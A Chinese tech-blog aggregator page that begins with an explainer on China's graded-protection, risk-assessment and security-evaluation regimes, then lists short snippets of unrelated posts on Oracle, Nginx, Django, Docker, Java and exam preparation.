    接触安全行业的大家大概会经常遇到这几个关键词,“等级保护”、“风险评估”、“系统安全评测”,这都是当前国家信息安全保障建设体系中的热门话题。但是肯定有很多小伙伴还是对他们之间的区别和联系不是那么明确,今天小编就来帮大家缕一缕。一、三者的概念介绍A、等级保护概念介绍:等级保护全名信息安全等级保护,是指对国家各类信息系统分等级进行安全保护,对信息系统中的安全产品进行等级管理,对信息系统中的信息安全事件
  • 五分钟了解等级保护、风险评估和安全测评三者的区别和联系? 亿林等保 安全网络安全
    等级保护基本概念:网络安全等级保护是指对国家秘密信息、法人和其他组织和公民的专有信息以及公开信息和存储、传输、处理这些信息的信息系统分等级实行安全保护,对信息系统中使用的安全产品实行按等级管理,对信息系统中发生的信息安全事件等等级响应、处置。这里所指的信息系统,是指由计算机及其相关和配套的设备、设施构成的,按照一定的应用目标和规则对信息进行存储、传输、处理的系统或者网络;信息是指在信息系统中存储、
  • 一分钟了解小程序的等保测评 亿林科技网络安全 小程序
    小程序作为移动互联网应用的一种形式,其安全性和合规性受到了国家法律法规的严格要求。根据《中华人民共和国网络安全法》和《信息安全技术个人信息安全规范》等相关法律法规,小程序在开发和运营过程中需要进行等级保护测评(等保测评),以确保用户数据的安全和隐私保护。等保测评是指对信息系统进行安全等级保护的评估,包括安全技术措施和安全管理措施的评估。小程序的等保测评得分需要在70分以上,且信息系统没有高风险项才
  • p2p网络,无边宇宙中的璀璨星河 weixin_33690367
    很多年前,家里刚买了电脑,第一件事就是下载游戏。那时候有很多单机游戏下载站,网速慢如蜗牛,一个G的游戏要下一天。后来,BT下载横空出世,小伙伴被BT下载的速度彻底震惊了,纷纷抛弃迅雷,安装上比特精灵,电驴之类的下载软件。人人可做种子(BT文件的seed),人人可发布资源,各种高清电影大片都有资源。打开BT下载,你就成为了BT网络的一份子,你既是客户端也是服务器,你是盗版资源的下载者也是发布者。当然
  • 阿里大牛漫谈“去IOE”架构: 过程苦 结局好 weixin_34194087 数据库
    2019独角兽企业重金招聘Python工程师标准>>>阿里大牛漫谈“去IOE”架构:过程苦结局好随着国外斯诺登的棱镜门事件持续发酵,国内近期一场大规模网络瘫痪引起轩然大波,安全问题将直指人心,一时间IOE(IBM、Oracle和EMC)被推到信息安全的风口浪尖,近日联想收购IBM的X86服务器更是削弱了IOE的力量。而由阿里人掀起的去“IOE”运动风险极高,但受益很高。没有了“IOE”这些高富帅的
  • 2023 下半年信息安全工程师考试真题答案 rockmelodies 安全网络安全
    一、单项选择如下有关信息安全管理员职责旳论述,不对旳旳是()A.信息安全管理员应当对网络旳总体安全布局进行规划B.信息安全管理员应当对信息系统安全事件进行处理C.信息安全管理员应当负责为顾客编写安全应用程序D.信息安全管理员应当对安全设备进行优化配置国家密码管理局于2023年公布了“无线局域网产品须使用旳系列密码算法”,其中规定密钥协商算法应使用旳是()A.DHB.ECDSAC.ECDHD.CPK
  • 四级信息安全工程师考试大纲 憨憨tiantian 笔记经验分享计算机网络操作系统
    文章目录前言:考核项目一、考试方式二、操作系统原理1.基本要求2.考试内容三、计算机网络1.基本要求2.考试内容总结前言:考核项目四级信息安全工程师考核操作系统原理和计算机网络两门课程。测试内容包括网络攻击与保护的基本理论技术,以及操作系统、路由设备的安全防范技能。一、考试方式本考试为上机考试,时长为90分钟,满分100分。考试题型及分值(1)操作系统原理——单选题(30分)(2)操作系统原理——
  • rman disk tape channel不释放导致自动压缩 jnrjian oracle
    APPLIESTO:OracleDatabase-EnterpriseEdition-Version11.2.0.4andlaterInformationinthisdocumentappliestoanyplatform.SYMPTOMSAbackuptotapeafterallocatingamaintenancechanneliscompressedalthoughthisisnotthec
  • 探索未知的利器:Detect It Easy(DIE)——文件类型检测大师 颜旖玫Michael
    探索未知的利器:DetectItEasy(DIE)——文件类型检测大师Detect-It-EasyProgramfordeterminingtypesoffilesforWindows,LinuxandMacOS.项目地址:https://gitcode.com/gh_mirrors/de/Detect-It-Easy在信息安全领域,了解文件的真实性质是至关重要的。DetectItEasy(简称D
  • 国产化操作系统(x86_64|aarch64)生态构建之RTSP播放器选型 音视频牛哥 大牛直播SDK音视频国产化操作系统rtsp播放器linuxrtsp播放器linuxarmrtsplinux平台rtsp播放aarch64rtsp大牛直播SDK
    为什么要推进国产化操作系统我们经常听到的一句话是:国货当自强!国产操作系统也是,推进国产化操作系统的原因是多方面的,推进国产化操作系统是保障国家信息安全、促进技术自主创新、提升产业竞争力以及满足特定需求的重要举措。未来,随着技术的不断进步和市场的不断扩展,国产化操作系统将迎来更加广阔的发展前景。一、保障国家信息安全减少对外部系统的依赖:国产化操作系统可以更好地符合国家安全标准,减少对国外操作系统的
  • 【转】oracle之报错:ORA-00054: 资源正忙,要求指定 NOWAIT aili6206 数据库
    问题如下:SQL>connscott/tiger@vm_databaseConnectedtoOracleDatabase11gEnterpriseEditionRelease11.1.0.6.0Connectedasscott。。。。。。SQL>droptablestudent2;droptablestudent2ORA-00054:资源正忙,但指定以NOWAIT方式获取资源,或者超时失效===
  • 本博客公告 维基人 公告安全系统安全web安全安全架构
    博客公告/soulblog一、博客涉及领域信息安全,计算机网络及操作系统等二、博客更新每周一和周六定时更新三、说明该博客上的所有文章都将在博客园、CSDN和Medium上持续,同步更新博客环境安全,无任何诱导链接,博客坚持无广告化,不会投放任何广告所有文章均为原创,转载请注明出处!四、同步链接本人已购多域名,通过GitHub绑定进行重定向到各平台上,通过本人的域名可以访问到各博客平台上链接如下(点
  • Python 数据分析— Pandas 基本操作(下) fjwangxi #python数据分析python数据分析pandas
    文章目录学习内容:一、数据分箱二、自定义函数三、DataFrame其他常用函数学习内容:一、数据分箱将Series的每个值对应到区间。cut(x=分箱对象Series或1维数组,bins=分箱数或区间,right=是否包含右值,labels=标签)1.对1维数组进行分箱np.random.seed(666)s=np.random.randint(25,100,size=10)#s值:array([
  • VCS命令行CTRL+C后dump完整的fsdb波形 sunvally 数字验证verdiuclidump
    UCLI命令行CTRL+C后dump完整的fsdb波形:1.ucli%fsdbDumpFinish2.ucli%fsdbDumpvars0"harness""+mda""+struct"如果仿真过程中直接CTRL+C会调到UCLI接口,此时如果仅是将FSDB波形拷贝到某个地方的话,verdi无法打开该波形(verdi-ssf$(tc)_$(seed).fsdb)。另外也无法用fsdb2vcd命令将
  • 网络安全工程师培训费用 汇智知了堂 web安全网络安全
    在当今这个信息化迅猛发展的时代,网络安全已成为各行各业关注的焦点。作为保障网络信息安全的中坚力量,网络安全工程师的需求量逐年攀升。随之而来的是,越来越多的人对网络安全工程师的培训费用充满了好奇。本文将为您详细解析这一问题,帮助您在选择培训时做出明智的决策。网络安全工程师培训费用因培训机构、课程内容和地点等因素而有所不同。一般来说,培训费用在几千到几万元之间。具体费用取决于所选的培训机构和课程。以下
  • 死守安全底线,荣耀8X全球首发“AI基站防伪技术” 科技银狐
    随着电信诈骗手段的不断升级,不少用户都被诈骗份子套入陷阱,相信这是很多消费者一直存在的痛点。但大部分手机厂商仍然在拼性能、拼功能的维度上,并没有重视用户的信息安全,这是让人比较失望的。目前市面上主流的免打扰和拦截垃圾信息的手段比较滞后,其做法无非是进行关键字匹配,将骚扰电话进行标记,如发现有标记的号码打来就直接阻断,但这种方式存在很多绕过的可能性,仍然无法根治此类问题。光靠手机进行单维度的防护总归
  • 基本数据类型和引用类型的初始值 3213213333332132 java基础
    package com.array; /** * @Description 测试初始值 * @author FuJianyong * 2015-1-22上午10:31:53 */ public class ArrayTest { ArrayTest at; String str; byte bt; short s; int i; long
  • 摘抄笔记--《编写高质量代码:改善Java程序的151个建议》 白糖_ 高质量代码
            记得3年前刚到公司,同桌同事见我无事可做就借我看《编写高质量代码:改善Java程序的151个建议》这本书,当时看了几页没上心就没研究了。到上个月在公司偶然看到,于是乎又找来看看,我的天,真是非常多的干货,对于我这种静不下心的人真是帮助莫大呀。           看完整本书,也记了不少笔记
  • 【备忘】Django 常用命令及最佳实践 dongwei_6688 django
    注意:本文基于 Django 1.8.2 版本   生成数据库迁移脚本(python 脚本) python manage.py makemigrations polls  说明:polls 是你的应用名字,运行该命令时需要根据你的应用名字进行调整   查看该次迁移需要执行的 SQL 语句(只查看语句,并不应用到数据库上): python manage.p
  • 阶乘算法之一N! 末尾有多少个零 周凡杨 java算法阶乘面试效率
                                     &n
  • spring注入servlet g21121 Spring注入
    传统的配置方法是无法将bean或属性直接注入到servlet中的,配置代理servlet亦比较麻烦,这里其实有比较简单的方法,其实就是在servlet的init()方法中加入要注入的内容: ServletContext application = getServletContext(); WebApplicationContext wac = WebApplicationContextUtil
  • Jenkins 命令行操作说明文档 510888780 centos
    假设Jenkins的URL为http://22.11.140.38:9080/jenkins/ 基本的格式为 java 基本的格式为 java -jar jenkins-cli.jar [-s JENKINS_URL] command [options][args] 下面具体介绍各个命令的作用及基本使用方法 1. &nb
  • UnicodeBlock检测中文用法 布衣凌宇 UnicodeBlock
    /**  * 判断输入的是汉字  */ public static boolean isChinese(char c) {        Character.UnicodeBlock ub = Character.UnicodeBlock.of(c);    
  • java下实现调用oracle的存储过程和函数 aijuans javaorale
    1.创建表:STOCK_PRICES     2.插入测试数据:     3.建立一个返回游标:  PKG_PUB_UTILS   4.创建和存储过程:P_GET_PRICE     5.创建函数:   6.JAVA调用存储过程返回结果集 JDBCoracle10G_INVO
  • Velocity Toolbox antlove 模板toolboxvelocity
    velocity.VelocityUtil package velocity; import org.apache.velocity.Template; import org.apache.velocity.app.Velocity; import org.apache.velocity.app.VelocityEngine; import org.apache.velocity.c
  • JAVA正则表达式匹配基础 百合不是茶 java正则表达式的匹配
      正则表达式;提高程序的性能,简化代码,提高代码的可读性,简化对字符串的操作   正则表达式的用途; 字符串的匹配 字符串的分割 字符串的查找 字符串的替换       正则表达式的验证语法     [a] //[]表示这个字符只出现一次 ,[a] 表示a只出现一
  • 是否使用EL表达式的配置 bijian1013 jspweb.xmlELEasyTemplate
            今天在开发过程中发现一个细节问题,由于前端采用EasyTemplate模板方法实现数据展示,但老是不能正常显示出来。后来发现竟是EL将我的EasyTemplate的${...}解释执行了,导致我的模板不能正常展示后台数据。         网
  • 精通Oracle10编程SQL(1-3)PLSQL基础 bijian1013 oracle数据库plsql
    --只包含执行部分的PL/SQL块 --set serveroutput off begin dbms_output.put_line('Hello,everyone!'); end; select * from emp; --包含定义部分和执行部分的PL/SQL块 declare v_ename varchar2(5); begin select
  • 【Nginx三】Nginx作为反向代理服务器 bit1129 nginx
    Nginx一个常用的功能是作为代理服务器。代理服务器通常完成如下的功能:   接受客户端请求 将请求转发给被代理的服务器 从被代理的服务器获得响应结果 把响应结果返回给客户端 实例 本文把Nginx配置成一个简单的代理服务器 对于静态的html和图片,直接从Nginx获取 对于动态的页面,例如JSP或者Servlet,Nginx则将请求转发给Res
  • Plugin execution not covered by lifecycle configuration: org.apache.maven.plugin blackproof maven报错
    转:http://stackoverflow.com/questions/6352208/how-to-solve-plugin-execution-not-covered-by-lifecycle-configuration-for-sprin   maven报错: Plugin execution not covered by lifecycle configuration:
  • 发布docker程序到marathon ronin47 docker 发布应用
    1 发布docker程序到marathon 1.1 搭建私有docker registry 1.1.1 安装docker regisry docker pull docker-registry docker run -t -p 5000:5000 docker-registry 下载docker镜像并发布到私有registry docker pull consol/tomcat-8.0
  • java-57-用两个栈实现队列&&用两个队列实现一个栈 bylijinnan java
    import java.util.ArrayList; import java.util.List; import java.util.Stack; /* * Q 57 用两个栈实现队列 */ public class QueueImplementByTwoStacks { private Stack<Integer> stack1; pr
  • Nginx配置性能优化 cfyme nginx
    转载地址:http://blog.csdn.net/xifeijian/article/details/20956605   大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装,修改这里或那里的几行配置,好了,你已经有了一个Web服务器了。而且,在大多数情况下,一个常规安装的nginx对你的网站来说已经能很好地工作了。然而,如果你真的想挤压出Nginx的性能,你必
  • [JAVA图形图像]JAVA体系需要稳扎稳打,逐步推进图像图形处理技术 comsci java
         对图形图像进行精确处理,需要大量的数学工具,即使是从底层硬件模拟层开始设计,也离不开大量的数学工具包,因为我认为,JAVA语言体系在图形图像处理模块上面的研发工作,需要从开发一些基础的,类似实时数学函数构造器和解析器的软件包入手,而不是急于利用第三方代码工具来实现一个不严格的图形图像处理软件......   &nb
  • MonkeyRunner的使用 dai_lm androidMonkeyRunner
    要使用MonkeyRunner,就要学习使用Python,哎 先抄一段官方doc里的代码 作用是启动一个程序(应该是启动程序默认的Activity),然后按MENU键,并截屏 # Imports the monkeyrunner modules used by this program from com.android.monkeyrunner import MonkeyRun
  • Hadoop-- 海量文件的分布式计算处理方案 datamachine mapreducehadoop分布式计算
    csdn的一个关于hadoop的分布式处理方案,存档。 原帖:http://blog.csdn.net/calvinxiu/article/details/1506112。     Hadoop 是Google MapReduce的一个Java实现。MapReduce是一种简化的分布式编程模式,让程序自动分布到一个由普通机器组成的超大集群上并发执行。就如同ja
  • 以資料庫驗證登入 dcj3sjt126com yii
    以資料庫驗證登入 由於 Yii 內定的原始框架程式, 採用綁定在UserIdentity.php 的 demo 與 admin 帳號密碼:    public function authenticate()    {        $users=array( &nbs
  • github做webhooks:[2]php版本自动触发更新 dcj3sjt126com githubgitwebhooks
    上次已经说过了如何在github控制面板做查看url的返回信息了。这次就到了直接贴钩子代码的时候了。 工具/原料 git github 方法/步骤   在github的setting里面的webhooks里把我们的url地址填进去。   钩子更新的代码如下: error_reportin
  • Eos开发常用表达式 蕃薯耀 Eos开发Eos入门Eos开发常用表达式
    Eos开发常用表达式 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2014年8月18日 15:03:35 星期一     &
  • SpringSecurity3.X--SpEL 表达式 hanqunfeng SpringSecurity
    使用 Spring 表达式语言配置访问控制,要实现这一功能的直接方式是在<http>配置元素上添加 use-expressions 属性:   <http auto-config="true" use-expressions="true"> 这样就会在投票器中自动增加一个投票器:org.springframework
  • Redis vs Memcache IXHONG redis
    1. Redis中,并不是所有的数据都一直存储在内存中的,这是和Memcached相比一个最大的区别。 2. Redis不仅仅支持简单的k/v类型的数据,同时还提供list,set,hash等数据结构的存储。 3. Redis支持数据的备份,即master-slave模式的数据备份。 4. Redis支持数据的持久化,可以将内存中的数据保持在磁盘中,重启的时候可以再次加载进行使用。 Red
  • Python - 装饰器使用过程中的误区解读 kvhur JavaScriptjqueryhtml5css
    大家都知道装饰器是一个很著名的设计模式,经常被用于AOP(面向切面编程)的场景,较为经典的有插入日志,性能测试,事务处理,Web权限校验, Cache等。 原文链接:http://www.gbtags.com/gb/share/5563.htm Python语言本身提供了装饰器语法(@),典型的装饰器实现如下:   @function_wrapper de
  • 架构师之mybatis-----update 带case when 针对多种情况更新 nannan408 case when
    1.前言.    如题. 2. 代码.   <update id="batchUpdate" parameterType="java.util.List"> <foreach collection="list" item="list" index=&
  • Algorithm算法视频教程 栏目记者 Algorithm算法
    课程:Algorithm算法视频教程 百度网盘下载地址: http://pan.baidu.com/s/1qWFjjQW 密码: 2mji 程序写的好不好,还得看算法屌不屌!Algorithm算法博大精深。 一、课程内容: 课时1、算法的基本概念 + Sequential search 课时2、Binary search 课时3、Hash table 课时4、Algor
  • C语言算法之冒泡排序 qiufeihu c算法
    任意输入10个数字由小到大进行排序。 代码: #include <stdio.h> int main() { int i,j,t,a[11]; /*定义变量及数组为基本类型*/ for(i = 1;i < 11;i++){ scanf("%d",&a[i]); /*从键盘中输入10个数*/ } for
  • JSP异常处理 wyzuomumu Webjsp
    1.在可能发生异常的网页中通过指令将HTTP请求转发给另一个专门处理异常的网页中: <%@ page errorPage="errors.jsp"%>   2.在处理异常的网页中做如下声明: errors.jsp: <%@ page isErrorPage="true"%>,这样设置完后就可以在网页中直接访问exc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他